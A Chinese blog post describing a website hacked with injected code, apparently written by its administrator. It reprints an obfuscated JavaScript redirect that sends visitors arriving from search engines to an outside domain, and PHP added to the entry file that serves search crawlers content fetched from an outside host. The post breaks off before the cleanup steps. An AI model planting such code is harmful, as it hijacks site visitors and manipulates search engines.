记一次网站被挂马的处理

上线的网站莫名其妙的突然出现ueditor的上传功能不能正常使用,console控制台提示

后台配置项返回格式出错,上传功能将不能正常使用!

日常百度、google发现没有和我的情况比较匹配的,他们出现这种原因多是ueditor的配置问题,但我之前都是可以用的,再用本地的备份代码测试也没问题。
然后查看网络请求,发现图片上传完之后返回的json数据之前还带了下面这段代码:

<script type="text/javascript">
var ct_O1 = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x72\x65\x66\x65\x72\x72\x65\x72"]
if (ct_O1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x67\x6f\x6f\x67\x6c\x65") > 0 || ct_O1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x62\x61\x69\x64\x75") > 0 || ct_O1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x73\x6f\x67\x6f\x75") > 0) location["\x68\x72\x65\x66"] = "\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x79\x63\x35\x35\x35\x38\x2e\x63\x6f\x6d";
</script>

趁着网站整体还没有大问题,把数据库和代码备份一下。接着把代码下载到本地,显示着用杀软查杀一下,发现没有任何效果,然后自己手动全局查找,发现入口文件被篡改。
入口文件头部被添加了如下的代码:

header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
   $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
   $file = file_get_contents('http://yc.rvvzz.com/bak/'."/index.php?host=".$host_name."&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']); 
   echo $file;
}

?>
<script type="text/javascript">
var ct_O1 = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x72\x65\x66\x65\x72\x72\x65\x72"]
if (ct_O1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x67\x6f\x6f\x67\x6c\x65") > 0 || ct_O1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x62\x61\x69\x64\x75") > 0 || ct_O1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x73\x6f\x67\x6f\x75") > 0) location["\x68\x72\x65\x66"] = "\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x79\x63\x35\x35\x35\x38\x2e\x63\x6f\x6d";
</script><?php

有急事先这样,处理流程待续。。。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值